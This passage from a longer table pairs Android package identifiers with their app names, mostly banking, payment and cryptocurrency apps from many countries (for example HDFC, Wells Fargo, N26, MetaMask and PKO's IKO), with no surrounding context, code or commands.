| com.sella.BancaSella | Banca Sella |
| com.shaketh | Shakepay: Buy Bitcoin Canada |
| com.sib.retail | SIB Digital |
| com.snapwork.IDBI | IDBI Bank GO Mobile+ |
| com.snapwork.hdfc | HDFC Bank MobileBanking |
| com.starfinanz.smob.android.sfinanzstatus | Sparkasse Ihre mobile Filiale |
| com.suntrust.mobilebanking | SunTrust Mobile App |
| com.tabtrader.android | TabTrader Buy Bitcoin and Ethereum on exchanges |
| com.targo_prod.bad | TARGOBANK Mobile Banking |
| com.targoes_prod.bad | TARGOBANK – Banca a distancia |
| com.tarjetanaranja.emisor.serviciosClientes.appTitulares | Naranja |
| com.td | TD Canada |
| com.tdbank | TD Bank (US) |
| com.teb | CEPTETEB |
| com.teb.kurumsal | CEPTETEB İŞTE |
| com.tecnocom.cajalaboral | Banca Móvil Laboral Kutxa |
| com.tfkb | Türkiye Finans Mobile Branch |
| com.tmobtech.halkbank | Halkbank Mobil |
| com.todo1.davivienda.mobileapp | Davivienda Móvil |
| com.todo1.mobile | Bancolombia App Personas |
| com.uab.personal | United Arab Bank Mobile |
| com.unicredit | Mobile Banking UniCredit |
| com.unocoin.unocoinwallet | Unocoin Wallet |
| com.usaa.mobile.android.usaa | USAA Mobile |
| com.usbank.mobilebanking | U.S. Bank – Inspired by customers |
| com.uy.itau.appitauuypf | Itaú Uruguay |
| com.vakifbank.mobile | VakıfBank Mobil Bankacılık |
| com.vakifkatilim.mobil | Mobile Branch |
| com.vancity.mobileapp | Vancity |
| com.vanso.gtbankapp | GTBank |
| com.vipera.chebanca | CheBanca! |
| com.vipera.nbf | NBF Direct App |
| com.vipera.ts.starter.MashreqAE | Mashreq UAE |
| com.vtb.mobilebank | VTB Mobile Georgia |
| com.wf.wellsfargomobile | Wells Fargo Mobile |
| com.woodforest | Woodforest Mobile Banking |
| com.wrx.wazirx | WazirX – Buy Sell Bitcoin & Other Cryptocurrencies |
| com.ykb.android | Yapı Kredi Mobile |
| com.zellepay.zelle | Zelle |
| com.ziraat.ziraatmobil | Ziraat Mobile |
| com.ziraatkatilim.mobilebanking | Katılım Mobil |
| com.zoluxiones.officebanking | Banco Santander Perú S.A. |
| coop.bancocredicoop.bancamobile | Credicoop Móvil |
| cz.csob.smartbanking | ČSOB Smartbanking |
| de.comdirect.android | comdirect mobile App |
| de.comdirect.app | comdirect |
| de.commerzbanking.mobil | Commerzbank Banking – The app at your side |
| de.consorsbank | Consorsbank |
| de.dkb.portalapp | DKB-Banking |
| de.fiducia.smartphone.android.banking.vr | VR Banking Classic |
| de.ingdiba.bankingapp | ING Banking to go |
| de.number26.android | N26 — The Mobile Bank |
| de.postbank.finanzassistent | Postbank Finanzassistent |
| de.santander.presentation | Santander Banking |
| de.sdvrz.ihb.mobile.app | SpardaApp |
| de.sdvrz.ihb.mobile.secureapp.sparda.produktion | SpardaSecureApp |
| de.traktorpool | tractorpool |
| dk.nordea.mobilebank | Nordea Mobile – Denmark |
| doge.org.freewallet.app | Dogecoin Wallet. Store & Exchange DOGE coin |
| enbd.mobilebanking | Emirates NBD |
| es.bancosantander.apps | Santander |
| es.bancosantander.empresas | Santander Empresas |
| es.caixagalicia.activamovil | ABANCA- Banca Móvil |
| es.caixageral.caixageralapp | Banco Caixa Geral España |
| es.caixaontinyent.caixaontinyentapp | Caixa Ontinyent |
| es.ceca.cajalnet | Cajalnet |
| es.cecabank.ealia2103appstore | UniPay Unicaja |
| es.cm.android | Bankia |
| es.evobanco.bancamovil | EVO Banco móvil |
| es.ibercaja.ibercajaapp | Ibercaja |
| es.lacaixa.mobile.android.newwapicon | CaixaBank |
| es.liberbank.cajasturapp | Banca Digital Liberbank |
| es.openbank.mobile | Openbank – banca móvil |
| es.orangebank.app | Orange Bank – Banco Móvil |
| es.pibank.customers | Pibank |
| es.santander.Criptocalculadora | Criptocalculadora |
| es.unicajabanco.app | Unicaja Banco |
| es.univia.unicajamovil | UnicajaMovil |
| eu.afse.omnia.attica | Attica Mobile |
| eu.atlantico.bancoatlanticoapp | MY ATLANTICO |
| eu.eleader.mobilebanking.abk | ABK Mobile Banking |
| eu.eleader.mobilebanking.invest | plusbank24 |
| eu.eleader.mobilebanking.nbk | NBK Mobile Banking |
| eu.eleader.mobilebanking.pekao | Pekao24Makler |
| eu.netinfo.colpatria.system | Scotiabank Colpatria |
| eu.unicreditgroup.hvbapptan | HVB Mobile Banking |
| finansbank.enpara | Enpara.com Cep Şubesi |
| finansbank.enpara.sirketim | Enpara.com Şirketim Cep Şubesi |
| fr.banquepopulaire.cyberplus | Banque Populaire |
| fr.bred.fr | BRED |
| fr.creditagricole.androidapp | Ma Banque |
| fr.lcl.android.customerarea | Mes Comptes – LCL |
| ge.bog.mobilebank | BOG mBank – Mobile Banking |
| ge.lb.mobilebank | Liberty |
| ge.mobility.basisbank | BasisBank |
| gr.co.hsbc.hsbcgr | HSBC Greece |
| gr.winbank.mobilenext | Winbank Mobile |
| hr.asseco.android.intesa.isbd.cib | CIB Bank |
| hr.asseco.android.jimba.mUCI.hu | UniCredit Mobile Application |
| hu.bb.mobilapp | Budapest Bank Mobil App |
| hu.cardinal.cib.mobilapp | CIB Business Online |
| hu.cardinal.erste.mobilapp | Erste Business MobilBank |
| hu.khb | K&H mobilbank |
| hu.mkb.mobilapp | MKB Mobilalkalmazás |
| hu.otpbank.mobile | OTP Bank HU |
| id.co.bitcoin | Indodax |
| il.co.yahav.mobbanking | בנק יהב – ניהול חשבון |
| il.co.yellow.app | yellow – מבצעים והטבות עם הארנק הדיגיטלי של פז! |
| io.metamask | MetaMask – Buy, Send and Swap Crypto |
| it.bcc.iccrea.mycartabcc | myCartaBCC |
| it.bnl.apps.banking | BNL |
| it.carige | Carige Mobile |
| it.copergmps.rt.pf.android.sp.bmps | Banca MPS |
| it.creval.bancaperta | Bancaperta |
| it.hype.app | Hype |
| it.icbpi.mobile | Nexi Pay |
| it.ingdirect.app | ING Italia |
| it.nogood.container | UBI Banca |
| it.popso.SCRIGNOapp | SCRIGNOapp |
| jp.co.aeonbank.android.passbook | イオン銀行通帳アプリ かんたんログイン&残高・明細の確認 |
| jp.co.netbk | 住信SBIネット銀行 |
| jp.co.rakuten_bank.rakutenbank | 楽天銀行 -個人のお客様向けアプリ |
| jp.co.smbc.direct | 三井住友銀行アプリ |
| jp.coincheck.android | Bitcoin Wallet Coincheck |
| ktbcs.netbank | Krungthai NEXT |
| lt.spectrofinance.spectrocoin.android.wallet | Bitcoin Wallet by SpectroCoin |
| ma.gbp.pocketbank | Pocket Bank |
| mbanking.NBG | NBG Mobile Banking |
| mobi.societegenerale.mobile.lappli | L’Appli Société Générale |
| mx.bancosantander.supermovil | Santander móvil |
| mx.hsbc.hsbcmexico | HSBC México |
| my.com.hsbc.hsbcmalaysia | HSBC Malaysia |
| my.com.maybank2u.m2umobile | Maybank2u MY |
| net.bitbay.bitcoin | Bitcoin & Crypto Exchange – BitBay |
| net.bitstamp.app | Bitstamp – Buy & Sell Bitcoin at Crypto Exchange |
| net.bnpparibas.mescomptes | Mes Comptes BNP Paribas |
| net.garagecoders.e_llavescotiainfo | ScotiaMóvil |
| net.inverline.bancosabadell.officelocator.android | Banco Sabadell App. Your mobile bank |
| nz.co.anz.android.mobilebanking | ANZ goMoney New Zealand |
| nz.co.asb.asbmobile | ASB Mobile Banking |
| nz.co.kiwibank.mobile | Kiwibank Mobile Banking |
| nz.co.westpac | Westpac One (NZ) Mobile Banking |
| org.banking.bom.businessconnect | Bank of Melbourne Business App |
| org.banking.bsa.businessconnect | BankSA Business App |
| org.banking.stg.businessconnect | St.George Business App |
| org.banksa.bank | BankSA Mobile Banking |
| org.bom.bank | Bank of Melbourne Mobile Banking |
| org.microemu.android.model.common.VTUserApplicationLINKMB | Link Celular |
| org.ncsecu.mobile | SECU |
| org.stgeorge.bank | St.George Mobile Banking |
| org.westpac.bank | Westpac Mobile Banking |
| org.westpac.col | Westpac Corporate Mobile |
| paladyum.peppara | PeP: Para Transferi Sanal Kart |
| pe.com.interbank.mobilebanking | Interbank APP |
| pe.com.scotiabank.blpm.android.client | Scotiabank Perú |
| pe.pichincha.bm | APP Banco Pichincha Perú |
| pegasus.project.ebh.mobile.android.bundle.mobilebank | George Magyarország |
| piuk.blockchain.android | Blockchain Wallet. Bitcoin, Bitcoin Cash, Ethereum |
| pl.aliorbank.aib | Alior Mobile |
| pl.allegro | Allegro – convenient and secure online shopping |
| pl.bph | BusinessPro Lite |
| pl.bps.bankowoscmobilna | BPS Mobilnie |
| pl.bzwbk.bzwbk24 | Santander mobile |
| pl.ceneo | Ceneo – zakupy i promocje |
| pl.com.rossmann.centauros | Rossmann PL |
| pl.envelobank.aplikacja | Pocztowy |
| pl.fakturownia | Fakturownia.pl |
| pl.ideabank.mobilebanking | Idea Bank PL |
| pl.ifirma.ifirmafaktury | IFIRMA – Darmowy Program do Faktur |
| pl.ing.mojeing | Moje ING mobile |
| pl.mbank | mBank PL |
| pl.nestbank.nestbank | Nest Bank nowy |
| pl.noblebank.mobile | Noble Mobile |
| pl.orange.mojeorange | Mój Orange |
| pl.pkobp.iko | IKO |
| pl.raiffeisen.nfc | Mobilny Portfel |
| pl.sgb.wallet | PORTFEL SGB |
| posteitaliane.posteapp.appbpol | BancoPosta |
| posteitaliane.posteapp.apppostepay | Postepay |
| pt.bancobest.android.mobilebanking | Best Bank |
| pt.bancobpi.mobile.fiabilizacao | BPI APP |
| pt.bctt.appbctt | Banco CTT |
| pt.cgd.caixadirectaempresas | Caixadirecta Empresas |
| pt.novobanco.nbapp | NB smart app |
| pt.santandertotta.mobileempresas | Santander Empresas |
| pt.santandertotta.mobileparticulares | Santander Particulares |
| pt.sibs.android.mbway | MB WAY |
| softax.pekao.powerpay | PeoPay |
| tr.com.abank.dijital | Alternatif Bank Mobil |
| tr.com.hsbc.hsbcturkey | HSBC Turkey |
| tr.com.hsbc.hsbcturkey.uk | HSBC Turkiye |
| tr.com.param.android | Param |
| tr.com.sekerbilisim.mbank | ŞEKER MOBİL ŞUBE |
| tr.gov.turkiye.edevlet.kapisi | e-Devlet Kapısı |
| trendyol.com | Trendyol – Hızlı ve Güvenli Alışverişin Yolu |
| tsb.mobilebanking | TSB Bank Mobile Banking |
| uy.brou | App Móvil del Banco República |
| uy.com.brou.token | BROU Llave Digital |
| wit.android.bcpBankingApp.activoBank | ActivoBank |
| wit.android.bcpBankingApp.millennium | Millenniumbcp |
| wit.android.bcpBankingApp.millenniumPL | Bank Millennium |
| www.ingdirect.nativeframe | ING España. Banca Móvil |